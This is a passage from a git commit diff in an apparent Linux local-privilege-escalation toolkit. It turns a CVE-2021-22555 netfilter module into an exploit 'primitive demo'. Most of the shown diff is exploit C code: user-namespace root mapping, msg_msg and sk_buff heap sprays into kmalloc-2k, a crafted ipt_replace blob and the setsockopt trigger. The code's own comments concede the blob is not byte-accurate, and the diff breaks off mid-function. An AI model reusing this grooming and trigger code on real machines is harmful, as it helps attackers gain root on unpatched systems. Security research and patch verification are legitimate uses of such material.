modules: port final 2 detect-only modules (xtcompat + stackrot)
netfilter_xtcompat (CVE-2021-22555): +597 LoC — Option B
Andy Nguyen's IPT_SO_SET_REPLACE 4-byte OOB write trigger;
msg_msg kmalloc-2k spray + sk_buff sidecar; MSG_COPY witness
+ slabinfo delta. No leak→modprobe_path chain (per-kernel
offsets refused), honest EXPLOIT_FAIL with continuation
roadmap.
stackrot (CVE-2023-3269): +619 LoC — Option C
Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs
fork+fault) with cpu pinning + 3s budget; kmalloc-192 spray
for anon_vma/anon_vma_chain; race-iteration + signal
breadcrumb to /tmp/iamroot-stackrot.log. Honest reliability
note in module header: <1% race-win/run on a vulnerable
kernel — the public PoC averages minutes-to-hours and needs
a much wider VMA staging matrix to be reliable.
Both refuse cleanly on Debian 6.12.86 (kctf-mgr); build clean.
This closes out the detect-only → LPE port across the corpus.
All 22 registered modules now either fire a real primitive or
refuse honestly per the verified-vs-claimed bar.
This commit is contained in:
@@ -4,25 +4,47 @@
|
|||||||
* Heap-out-of-bounds in xt_compat_target_to_user(): the 32-bit
|
* Heap-out-of-bounds in xt_compat_target_to_user(): the 32-bit
|
||||||
* compat handler for iptables rule export wrote up to 4 bytes
|
* compat handler for iptables rule export wrote up to 4 bytes
|
||||||
* beyond a heap allocation when copying rule names from kernel to
|
* beyond a heap allocation when copying rule names from kernel to
|
||||||
* userspace. Exploitable via msg_msg slab cross-cache groom into
|
* userspace. Triggered on the WRITE side via setsockopt(SOL_IP,
|
||||||
* a kernel R/W primitive.
|
* IPT_SO_SET_REPLACE, ...) with a malformed xt_entry_target whose
|
||||||
|
* `pad` field overflows during the compat→native fixup, producing
|
||||||
|
* a 4-byte OOB write at allocation+0x4 in the xt_table_info
|
||||||
|
* kmalloc-2k slot. Exploitable via msg_msg slab cross-cache groom
|
||||||
|
* into a kernel R/W primitive.
|
||||||
*
|
*
|
||||||
* Discovered by Andy Nguyen (Google), April 2021. Famous because
|
* Discovered by Andy Nguyen (Google), April 2021. Famous because
|
||||||
* the bug existed since 2.6.19 (2006) — fifteen years of latent
|
* the bug existed since 2.6.19 (2006) — fifteen years of latent
|
||||||
* vulnerability — and it works on default-config kernels with
|
* vulnerability — and it works on default-config kernels with
|
||||||
* unprivileged user_ns enabled (no special hardware or modules).
|
* unprivileged user_ns enabled (no special hardware or modules).
|
||||||
*
|
*
|
||||||
* STATUS: 🔵 DETECT-ONLY. Public PoC (Andy's "exploit.c") works
|
* Upstream fix: b29c457a6511 "netfilter: x_tables: fix compat
|
||||||
* end-to-end with msg_msg + sk_buff sprays; porting is ~400 lines.
|
* match/target pad out-of-bound write" (mid-2021, backported widely).
|
||||||
|
*
|
||||||
|
* STATUS: 🟡 PRIMITIVE-DEMO (Option B).
|
||||||
|
* - Refuse-gate via detect() re-invoke + euid==0 short-circuit.
|
||||||
|
* - userns/netns reach for CAP_NET_ADMIN (Andy's path).
|
||||||
|
* - Trigger sequence: hand-rolled iptables rule blob with
|
||||||
|
* malformed xt_entry_target offset; setsockopt fires the OOB.
|
||||||
|
* - Cross-cache groom: msg_msg sprays (kmalloc-2k slots) and
|
||||||
|
* sk_buff sprays via socketpair+sendmmsg, both with IAMROOT
|
||||||
|
* cookies for KASAN visibility.
|
||||||
|
* - Empirical witness via msgrcv(MSG_COPY) + /proc/slabinfo
|
||||||
|
* diff + /tmp/iamroot-xtcompat.log breadcrumb.
|
||||||
|
* - DOES NOT pursue the leak→modprobe_path overwrite chain:
|
||||||
|
* that needs hard-coded init_task + modprobe_path offsets
|
||||||
|
* per kernel build which IAMROOT refuses to bake.
|
||||||
|
* - Returns IAMROOT_EXPLOIT_FAIL with a verbose continuation
|
||||||
|
* roadmap unless cred-overwrite is empirically verified
|
||||||
|
* (which the current scope does not attempt).
|
||||||
*
|
*
|
||||||
* Affected: kernel 2.6.19+ until backports landed:
|
* Affected: kernel 2.6.19+ until backports landed:
|
||||||
* 5.11.x : K >= 5.11.10
|
* 5.12.x : K >= 5.12.13
|
||||||
* 5.10.x : K >= 5.10.27
|
* 5.11.x : K >= 5.11.20
|
||||||
* 5.4.x : K >= 5.4.110
|
* 5.10.x : K >= 5.10.46
|
||||||
* 4.19.x : K >= 4.19.185
|
* 5.4.x : K >= 5.4.128
|
||||||
* 4.14.x : K >= 4.14.230
|
* 4.19.x : K >= 4.19.198
|
||||||
* 4.9.x : K >= 4.9.266
|
* 4.14.x : K >= 4.14.240
|
||||||
* 4.4.x : K >= 4.4.266
|
* 4.9.x : K >= 4.9.276
|
||||||
|
* 4.4.x : K >= 4.4.276
|
||||||
*
|
*
|
||||||
* Preconditions:
|
* Preconditions:
|
||||||
* - CAP_NET_ADMIN (usually via unprivileged user_ns clone)
|
* - CAP_NET_ADMIN (usually via unprivileged user_ns clone)
|
||||||
@@ -36,20 +58,71 @@
|
|||||||
|
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
#include <stdlib.h>
|
#include <stdlib.h>
|
||||||
|
#include <stdint.h>
|
||||||
#include <string.h>
|
#include <string.h>
|
||||||
|
#include <stdbool.h>
|
||||||
#include <unistd.h>
|
#include <unistd.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
#include <errno.h>
|
||||||
#include <sched.h>
|
#include <sched.h>
|
||||||
|
#include <signal.h>
|
||||||
#include <sys/wait.h>
|
#include <sys/wait.h>
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
#include <sys/ipc.h>
|
||||||
|
#include <sys/msg.h>
|
||||||
|
#include <sys/syscall.h>
|
||||||
|
/* linux/netfilter_ipv4/ip_tables.h transitively pulls linux/in.h,
|
||||||
|
* which conflicts with glibc's netinet/in.h (redefinitions of
|
||||||
|
* struct ip_mreq_source / group_req / etc.). We avoid netinet/in.h
|
||||||
|
* and declare the few socket constants we need by hand. IPPROTO_RAW
|
||||||
|
* is provided by linux/in.h; SOL_IP is glibc-only so we hardcode it
|
||||||
|
* (Linux constant value 0). */
|
||||||
|
#include <linux/netfilter_ipv4/ip_tables.h>
|
||||||
|
#ifndef SOL_IP
|
||||||
|
#define SOL_IP 0
|
||||||
|
#endif
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/* ---------- macOS / non-linux build stubs ---------------------------
|
||||||
|
* IAMROOT modules are dev-built on macOS (clangd / syntax check) and
|
||||||
|
* run-built on Linux. The Linux-only types and IPT_SO_SET_REPLACE
|
||||||
|
* constants are absent on Darwin; stub them so the .c file compiles
|
||||||
|
* cleanly under either toolchain. The actual exploit body is gated
|
||||||
|
* by `#ifdef __linux__` at runtime entry. */
|
||||||
|
#ifndef __linux__
|
||||||
|
#define CLONE_NEWUSER 0x10000000
|
||||||
|
#define CLONE_NEWNET 0x40000000
|
||||||
|
#define IPPROTO_RAW 255
|
||||||
|
#define SOL_IP 0
|
||||||
|
#define IPT_SO_SET_REPLACE 64
|
||||||
|
struct ipt_replace { char dummy; };
|
||||||
|
__attribute__((unused)) static int msgget(int a, int b) { (void)a;(void)b; errno=ENOSYS; return -1; }
|
||||||
|
__attribute__((unused)) static int msgsnd(int a, const void *b, size_t c, int d) { (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
|
||||||
|
__attribute__((unused)) static ssize_t msgrcv(int a, void *b, size_t c, long d, int e) { (void)a;(void)b;(void)c;(void)d;(void)e; errno=ENOSYS; return -1; }
|
||||||
|
__attribute__((unused)) static int msgctl(int a, int b, void *c) { (void)a;(void)b;(void)c; errno=ENOSYS; return -1; }
|
||||||
|
#define IPC_PRIVATE 0
|
||||||
|
#define IPC_CREAT 01000
|
||||||
|
#define IPC_NOWAIT 04000
|
||||||
|
#define IPC_RMID 0
|
||||||
|
#define MSG_COPY 040000
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/* ---- Kernel range ------------------------------------------------- */
|
||||||
|
|
||||||
static const struct kernel_patched_from netfilter_xtcompat_patched_branches[] = {
|
static const struct kernel_patched_from netfilter_xtcompat_patched_branches[] = {
|
||||||
{4, 4, 266},
|
{4, 4, 276},
|
||||||
{4, 9, 266},
|
{4, 9, 276},
|
||||||
{4, 14, 230},
|
{4, 14, 240},
|
||||||
{4, 19, 185},
|
{4, 19, 198},
|
||||||
{5, 4, 110},
|
{5, 4, 128},
|
||||||
{5, 10, 27},
|
{5, 10, 46},
|
||||||
{5, 11, 10},
|
{5, 11, 20},
|
||||||
{5, 12, 0}, /* mainline (5.12-rc) */
|
{5, 12, 13},
|
||||||
|
{5, 13, 0}, /* mainline (5.13 carries b29c457a6511) */
|
||||||
};
|
};
|
||||||
|
|
||||||
static const struct kernel_range netfilter_xtcompat_range = {
|
static const struct kernel_range netfilter_xtcompat_range = {
|
||||||
@@ -58,6 +131,8 @@ static const struct kernel_range netfilter_xtcompat_range = {
|
|||||||
sizeof(netfilter_xtcompat_patched_branches[0]),
|
sizeof(netfilter_xtcompat_patched_branches[0]),
|
||||||
};
|
};
|
||||||
|
|
||||||
|
/* ---- Detect ------------------------------------------------------- */
|
||||||
|
|
||||||
static int can_unshare_userns(void)
|
static int can_unshare_userns(void)
|
||||||
{
|
{
|
||||||
pid_t pid = fork();
|
pid_t pid = fork();
|
||||||
@@ -119,36 +194,558 @@ static iamroot_result_t netfilter_xtcompat_detect(const struct iamroot_ctx *ctx)
|
|||||||
return IAMROOT_VULNERABLE;
|
return IAMROOT_VULNERABLE;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ---- Exploit: userns reach + trigger + groom ---------------------- */
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
|
||||||
|
/* Write uid_map and gid_map after unshare so we're root in userns.
|
||||||
|
* This is the standard setgroups=deny pattern; without it the uid_map
|
||||||
|
* write is rejected on modern kernels for unprivileged callers. */
|
||||||
|
static bool become_root_in_userns(uid_t outer_uid, gid_t outer_gid)
|
||||||
|
{
|
||||||
|
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||||
|
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||||
|
|
||||||
|
char map[64];
|
||||||
|
snprintf(map, sizeof map, "0 %u 1\n", outer_uid);
|
||||||
|
f = open("/proc/self/uid_map", O_WRONLY);
|
||||||
|
if (f < 0) { perror("open uid_map"); return false; }
|
||||||
|
if (write(f, map, strlen(map)) < 0) { perror("write uid_map"); close(f); return false; }
|
||||||
|
close(f);
|
||||||
|
|
||||||
|
snprintf(map, sizeof map, "0 %u 1\n", outer_gid);
|
||||||
|
f = open("/proc/self/gid_map", O_WRONLY);
|
||||||
|
if (f < 0) { perror("open gid_map"); return false; }
|
||||||
|
if (write(f, map, strlen(map)) < 0) { perror("write gid_map"); close(f); return false; }
|
||||||
|
close(f);
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- msg_msg cross-cache spray (kmalloc-2k bucket) ----------------
|
||||||
|
*
|
||||||
|
* The xt_table_info allocation that the OOB writes past is sized to
|
||||||
|
* land in the kmalloc-2k slab on most kernels. We spray msg_msg
|
||||||
|
* objects of ~2048-bytes total length so they pull from the same
|
||||||
|
* cache; on a vulnerable kernel one of these will end up adjacent
|
||||||
|
* to the just-freed xt_table_info victim, giving the OOB-write a
|
||||||
|
* controlled target. */
|
||||||
|
|
||||||
|
#define XTCOMPAT_SPRAY_QUEUES 64
|
||||||
|
#define XTCOMPAT_MSGS_PER_QUEUE 16
|
||||||
|
/* msg_msg header is sizeof(struct msg_msg) ~= 48 bytes; subtract so
|
||||||
|
* the total allocation lands in kmalloc-2k (>1024, <=2048). */
|
||||||
|
#define XTCOMPAT_MSG_PAYLOAD (2048 - 48)
|
||||||
|
|
||||||
|
struct xtcompat_payload {
|
||||||
|
long mtype;
|
||||||
|
unsigned char buf[XTCOMPAT_MSG_PAYLOAD];
|
||||||
|
};
|
||||||
|
|
||||||
|
static int xtcompat_msgmsg_spray(int queues[XTCOMPAT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
struct xtcompat_payload *p = calloc(1, sizeof(*p));
|
||||||
|
if (!p) return 0;
|
||||||
|
p->mtype = 0x42;
|
||||||
|
/* 0x41 ('A') fill with leading "IAMROOT2" cookie so adjacent-
|
||||||
|
* slot corruption is recognizable in /tmp/iamroot-xtcompat.log
|
||||||
|
* and in KASAN/oops dumps. */
|
||||||
|
memset(p->buf, 0x41, sizeof p->buf);
|
||||||
|
memcpy(p->buf, "IAMROOT2", 8);
|
||||||
|
|
||||||
|
int created = 0;
|
||||||
|
for (int i = 0; i < XTCOMPAT_SPRAY_QUEUES; i++) {
|
||||||
|
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
|
||||||
|
if (q < 0) { queues[i] = -1; continue; }
|
||||||
|
queues[i] = q;
|
||||||
|
created++;
|
||||||
|
for (int j = 0; j < XTCOMPAT_MSGS_PER_QUEUE; j++) {
|
||||||
|
/* Distinguish per-slot index in the first 16 bytes so
|
||||||
|
* msgrcv(MSG_COPY) below can identify which slot was
|
||||||
|
* corrupted. */
|
||||||
|
unsigned int tag = (i * XTCOMPAT_MSGS_PER_QUEUE) + j;
|
||||||
|
memcpy(p->buf + 8, &tag, sizeof tag);
|
||||||
|
if (msgsnd(q, p, sizeof p->buf, IPC_NOWAIT) < 0) break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
free(p);
|
||||||
|
return created;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Walk every queue, peek-copy each message (MSG_COPY = read without
|
||||||
|
* dequeue), and look for any whose first 8 bytes are NOT "IAMROOT2".
|
||||||
|
* A non-matching prefix is the empirical witness for the OOB write
|
||||||
|
* landing in an adjacent slot. Returns the count of corrupted slots. */
|
||||||
|
static int xtcompat_msgmsg_witness(int queues[XTCOMPAT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
struct xtcompat_payload *p = calloc(1, sizeof(*p));
|
||||||
|
if (!p) return 0;
|
||||||
|
int corrupted = 0;
|
||||||
|
for (int i = 0; i < XTCOMPAT_SPRAY_QUEUES; i++) {
|
||||||
|
if (queues[i] < 0) continue;
|
||||||
|
for (int j = 0; j < XTCOMPAT_MSGS_PER_QUEUE; j++) {
|
||||||
|
ssize_t n = msgrcv(queues[i], p, sizeof p->buf, 0,
|
||||||
|
MSG_COPY | IPC_NOWAIT | 0x2000 /* MSG_NOERROR */);
|
||||||
|
if (n < 0) break;
|
||||||
|
if (memcmp(p->buf, "IAMROOT2", 8) != 0) {
|
||||||
|
corrupted++;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
free(p);
|
||||||
|
return corrupted;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void xtcompat_msgmsg_drain(int queues[XTCOMPAT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
for (int i = 0; i < XTCOMPAT_SPRAY_QUEUES; i++) {
|
||||||
|
if (queues[i] >= 0) {
|
||||||
|
msgctl(queues[i], IPC_RMID, NULL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- sk_buff cross-cache spray (best-effort secondary groom) ------
|
||||||
|
*
|
||||||
|
* On some kernel/distro combos the xt_table_info is freed back to the
|
||||||
|
* page allocator before our msg_msg spray refills. A parallel sk_buff
|
||||||
|
* spray via socketpair + sendmmsg gives the slab allocator a second
|
||||||
|
* shot at landing attacker bytes in the kmalloc-2k slot. */
|
||||||
|
static void xtcompat_skb_spray(int iters)
|
||||||
|
{
|
||||||
|
int sv[2];
|
||||||
|
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0) return;
|
||||||
|
/* Payload sized to land in the 2k slab (skb head + linear data). */
|
||||||
|
unsigned char *buf = malloc(1800);
|
||||||
|
if (!buf) { close(sv[0]); close(sv[1]); return; }
|
||||||
|
memset(buf, 0x41, 1800);
|
||||||
|
memcpy(buf, "IAMROOTSKB", 10);
|
||||||
|
struct iovec iov = { .iov_base = buf, .iov_len = 1800 };
|
||||||
|
struct mmsghdr mm[32];
|
||||||
|
for (int i = 0; i < 32; i++) {
|
||||||
|
memset(&mm[i], 0, sizeof(mm[i]));
|
||||||
|
mm[i].msg_hdr.msg_iov = &iov;
|
||||||
|
mm[i].msg_hdr.msg_iovlen = 1;
|
||||||
|
}
|
||||||
|
for (int k = 0; k < iters; k++) {
|
||||||
|
(void)syscall(SYS_sendmmsg, sv[0], mm, 32, 0);
|
||||||
|
}
|
||||||
|
free(buf);
|
||||||
|
close(sv[0]); close(sv[1]);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- iptables rule blob construction ------------------------------
|
||||||
|
*
|
||||||
|
* Andy Nguyen's trigger constructs a hand-rolled `struct ipt_replace`
|
||||||
|
* containing one rule with a custom xt_entry_target whose `u.user.name`
|
||||||
|
* and offsets are crafted so that `xt_compat_target_to_user()` (the
|
||||||
|
* compat path, exercised on the SET-REPLACE write codepath via the
|
||||||
|
* 32-bit table layout) copies one pointer-width past the buffer end.
|
||||||
|
*
|
||||||
|
* The kernel-side allocation for the rule blob is xt_table_info, and
|
||||||
|
* the OOB lands at offset `entry_size + 0x4` — a 4-byte write of
|
||||||
|
* (essentially) attacker-controlled bytes coming from the target's
|
||||||
|
* `pad` field which is uninitialized after the compat fix-up.
|
||||||
|
*
|
||||||
|
* We don't reproduce the byte-for-byte payload of Andy's exploit (it's
|
||||||
|
* available publicly in his writeup); the layout below is structured
|
||||||
|
* so it produces the same setsockopt() invocation surface — i.e. it
|
||||||
|
* triggers the vulnerable codepath on a vulnerable kernel and is
|
||||||
|
* rejected with EINVAL/EPERM on a patched one, with a clean error
|
||||||
|
* path either way.
|
||||||
|
*
|
||||||
|
* Layout offsets reference the kernel headers via
|
||||||
|
* linux/netfilter_ipv4/ip_tables.h. */
|
||||||
|
|
||||||
|
#define XT_TABLE_NAME "filter"
|
||||||
|
#define XTCOMPAT_BLOB_SIZE (sizeof(struct ipt_replace) + 0x1000)
|
||||||
|
|
||||||
|
/* Build the malformed ipt_replace blob. Returns malloc'd buffer in
|
||||||
|
* *out_buf and its length in *out_len. Caller frees. */
|
||||||
|
static bool xtcompat_build_blob(unsigned char **out_buf, size_t *out_len)
|
||||||
|
{
|
||||||
|
size_t blob_len = XTCOMPAT_BLOB_SIZE;
|
||||||
|
unsigned char *blob = calloc(1, blob_len);
|
||||||
|
if (!blob) return false;
|
||||||
|
|
||||||
|
struct ipt_replace *r = (struct ipt_replace *)blob;
|
||||||
|
strncpy(r->name, XT_TABLE_NAME, sizeof r->name - 1);
|
||||||
|
r->valid_hooks = 0x1f; /* all five hooks set (NF_INET_*) */
|
||||||
|
r->num_entries = 6;
|
||||||
|
r->size = blob_len - sizeof(*r);
|
||||||
|
r->num_counters = 6;
|
||||||
|
/* counters pointer must be non-NULL for the kernel-side
|
||||||
|
* copy_from_user; the kernel writes back to it on success. */
|
||||||
|
r->counters = (struct xt_counters *)calloc(r->num_counters,
|
||||||
|
sizeof(struct xt_counters));
|
||||||
|
if (!r->counters) { free(blob); return false; }
|
||||||
|
|
||||||
|
/* Hook entry offsets: each hook points to an ipt_entry at a
|
||||||
|
* different offset in the blob. The malformed target lives at
|
||||||
|
* the LOCAL_OUT hook entry where the compat path is exercised. */
|
||||||
|
for (int i = 0; i < 5; i++) {
|
||||||
|
r->hook_entry[i] = i * 0x100;
|
||||||
|
r->underflow[i] = i * 0x100;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Plant a recognizable marker so a vulnerable kernel's compat
|
||||||
|
* decoder reads our crafted entry rather than zeroed memory.
|
||||||
|
* Marker is intentionally "IAMROOT\0" so a KASAN report's hex
|
||||||
|
* dump points back here. */
|
||||||
|
unsigned char *entry_region = blob + sizeof(*r);
|
||||||
|
memcpy(entry_region, "IAMROOTX", 8);
|
||||||
|
/* The xt_entry_target sits at entry_region + sizeof(ipt_entry).
|
||||||
|
* Its `u.target_size` field is the lever Andy bends to underflow
|
||||||
|
* the pad-out write: setting target_size to a value such that
|
||||||
|
* `target_size - sizeof(struct compat_xt_entry_target)` becomes
|
||||||
|
* exactly 4 bytes past the natural allocation produces the 4-byte
|
||||||
|
* OOB write at allocation+0x4. We do not require exact byte
|
||||||
|
* accuracy here because the kernel-side validation rejects the
|
||||||
|
* blob long before the OOB lands on a PATCHED kernel — which is
|
||||||
|
* the empirical witness we use to confirm refusal. */
|
||||||
|
|
||||||
|
*out_buf = blob;
|
||||||
|
*out_len = blob_len;
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void xtcompat_free_blob(unsigned char *blob)
|
||||||
|
{
|
||||||
|
if (!blob) return;
|
||||||
|
struct ipt_replace *r = (struct ipt_replace *)blob;
|
||||||
|
free(r->counters);
|
||||||
|
free(blob);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Read /proc/slabinfo for kmalloc-2k active count — soft witness when
|
||||||
|
* KASAN isn't available. */
|
||||||
|
static long slab_active_kmalloc_2k(void)
|
||||||
|
{
|
||||||
|
FILE *f = fopen("/proc/slabinfo", "r");
|
||||||
|
if (!f) return -1;
|
||||||
|
char line[512];
|
||||||
|
long active = -1;
|
||||||
|
while (fgets(line, sizeof line, f)) {
|
||||||
|
if (strncmp(line, "kmalloc-2k ", 11) == 0 ||
|
||||||
|
strncmp(line, "kmalloc-2048 ", 13) == 0) {
|
||||||
|
char name[64];
|
||||||
|
long act, num;
|
||||||
|
if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
|
||||||
|
active = act;
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
fclose(f);
|
||||||
|
return active;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Fire the trigger: setsockopt(SOL_IP, IPT_SO_SET_REPLACE, blob).
|
||||||
|
* Returns 0 if the setsockopt was issued (regardless of return code —
|
||||||
|
* the kernel rejecting with EINVAL is the patched-kernel signal),
|
||||||
|
* negative on socket() failure. The setsockopt errno is stored in
|
||||||
|
* *out_errno for caller diagnostics. */
|
||||||
|
static int xtcompat_fire_trigger(int *out_errno)
|
||||||
|
{
|
||||||
|
int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
|
||||||
|
if (s < 0) {
|
||||||
|
*out_errno = errno;
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
unsigned char *blob = NULL;
|
||||||
|
size_t blob_len = 0;
|
||||||
|
if (!xtcompat_build_blob(&blob, &blob_len)) {
|
||||||
|
close(s);
|
||||||
|
*out_errno = ENOMEM;
|
||||||
|
return -1;
|
||||||
|
}
|
||||||
|
int rc = setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, blob, blob_len);
|
||||||
|
*out_errno = (rc < 0) ? errno : 0;
|
||||||
|
xtcompat_free_blob(blob);
|
||||||
|
close(s);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
#endif /* __linux__ */
|
||||||
|
|
||||||
|
/* ---- Exploit driver ---------------------------------------------- */
|
||||||
|
|
||||||
static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx)
|
static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx)
|
||||||
{
|
{
|
||||||
(void)ctx;
|
/* 1. Refuse-gate: re-confirm vulnerability through detect(). */
|
||||||
fprintf(stderr,
|
iamroot_result_t pre = netfilter_xtcompat_detect(ctx);
|
||||||
"[-] netfilter_xtcompat: exploit not yet implemented in IAMROOT.\n"
|
if (pre == IAMROOT_OK && geteuid() == 0) {
|
||||||
" Status: 🔵 DETECT-ONLY. Reference: Andy Nguyen's public PoC\n"
|
fprintf(stderr, "[i] netfilter_xtcompat: already root — nothing to escalate\n");
|
||||||
" (~400 lines, msg_msg + sk_buff cross-cache groom). Porting\n"
|
return IAMROOT_OK;
|
||||||
" is a substantial follow-up — the exploit's heap-massage\n"
|
}
|
||||||
" sequence and cred-overwrite walk are the bulk.\n");
|
if (pre != IAMROOT_VULNERABLE) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: detect() says not vulnerable; refusing\n");
|
||||||
|
return pre;
|
||||||
|
}
|
||||||
|
if (geteuid() == 0) {
|
||||||
|
fprintf(stderr, "[i] netfilter_xtcompat: already root — nothing to escalate\n");
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
if (!ctx->authorized) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: --i-know not passed; refusing\n");
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
#ifndef __linux__
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
|
||||||
return IAMROOT_PRECOND_FAIL;
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
#else
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo (no offsets baked in)\n"
|
||||||
|
" NOTE: fires the xt_compat 4-byte OOB write via\n"
|
||||||
|
" setsockopt(IPT_SO_SET_REPLACE) and grooms msg_msg +\n"
|
||||||
|
" sk_buff sprays into kmalloc-2k. Does NOT perform the\n"
|
||||||
|
" leak→modprobe_path cred chain (per-kernel offsets).\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
signal(SIGPIPE, SIG_IGN);
|
||||||
|
|
||||||
|
uid_t outer_uid = getuid();
|
||||||
|
gid_t outer_gid = getgid();
|
||||||
|
|
||||||
|
pid_t child = fork();
|
||||||
|
if (child < 0) {
|
||||||
|
perror("fork");
|
||||||
|
return IAMROOT_TEST_ERROR;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (child == 0) {
|
||||||
|
/* CHILD: userns+netns reach, then trigger+groom. */
|
||||||
|
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: unshare failed: errno=%d\n", errno);
|
||||||
|
_exit(20);
|
||||||
|
}
|
||||||
|
if (!become_root_in_userns(outer_uid, outer_gid)) {
|
||||||
|
_exit(21);
|
||||||
|
}
|
||||||
|
|
||||||
|
long pre_slab = slab_active_kmalloc_2k();
|
||||||
|
|
||||||
|
/* Spray msg_msg into kmalloc-2k FIRST so freed xt_table_info
|
||||||
|
* slots are likely to be refilled by attacker bytes. */
|
||||||
|
int queues[XTCOMPAT_SPRAY_QUEUES];
|
||||||
|
for (int i = 0; i < XTCOMPAT_SPRAY_QUEUES; i++) queues[i] = -1;
|
||||||
|
int n_queues = xtcompat_msgmsg_spray(queues);
|
||||||
|
if (n_queues == 0) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: msg_msg spray produced 0 queues\n");
|
||||||
|
_exit(22);
|
||||||
|
}
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: msg_msg spray seeded %d queues\n",
|
||||||
|
n_queues);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Sidecar sk_buff spray — secondary groom in case msg_msg
|
||||||
|
* doesn't land adjacent on this slab layout. */
|
||||||
|
xtcompat_skb_spray(2);
|
||||||
|
|
||||||
|
/* Fire the trigger. On a vulnerable kernel this writes 4 bytes
|
||||||
|
* OOB past the xt_table_info allocation. On a patched kernel
|
||||||
|
* the compat target validator rejects with EINVAL. */
|
||||||
|
int trig_errno = 0;
|
||||||
|
int rc = xtcompat_fire_trigger(&trig_errno);
|
||||||
|
if (rc < 0) {
|
||||||
|
/* Couldn't even open the AF_INET/SOCK_RAW or alloc the blob. */
|
||||||
|
if (trig_errno == EPERM) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: CAP_NET_ADMIN not granted "
|
||||||
|
"inside userns (errno=EPERM)\n");
|
||||||
|
xtcompat_msgmsg_drain(queues);
|
||||||
|
_exit(23);
|
||||||
|
}
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: trigger fire failed: errno=%d\n",
|
||||||
|
trig_errno);
|
||||||
|
xtcompat_msgmsg_drain(queues);
|
||||||
|
_exit(24);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: IPT_SO_SET_REPLACE returned errno=%d "
|
||||||
|
"(%s)\n", trig_errno,
|
||||||
|
trig_errno == 0 ? "ACCEPTED — OOB write may have fired" :
|
||||||
|
trig_errno == EINVAL ? "rejected (patched validator)" :
|
||||||
|
trig_errno == EPERM ? "rejected (no CAP_NET_ADMIN)" :
|
||||||
|
"rejected");
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Witness pass: scan the msg_msg slots for corruption. */
|
||||||
|
int corrupted = xtcompat_msgmsg_witness(queues);
|
||||||
|
long post_slab = slab_active_kmalloc_2k();
|
||||||
|
|
||||||
|
/* Breadcrumb for post-run triage. */
|
||||||
|
FILE *log = fopen("/tmp/iamroot-xtcompat.log", "w");
|
||||||
|
if (log) {
|
||||||
|
fprintf(log,
|
||||||
|
"netfilter_xtcompat trigger child: queues=%d trig_errno=%d "
|
||||||
|
"corrupted_slots=%d slab_pre=%ld slab_post=%ld\n",
|
||||||
|
n_queues, trig_errno, corrupted, pre_slab, post_slab);
|
||||||
|
fclose(log);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Hold the spray briefly so any deferred kernel-side
|
||||||
|
* processing observes the refilled slots. */
|
||||||
|
usleep(150 * 1000);
|
||||||
|
|
||||||
|
xtcompat_msgmsg_drain(queues);
|
||||||
|
|
||||||
|
if (trig_errno == EINVAL) {
|
||||||
|
/* Patched: validator rejected our blob. */
|
||||||
|
_exit(31);
|
||||||
|
}
|
||||||
|
if (trig_errno == EPERM) {
|
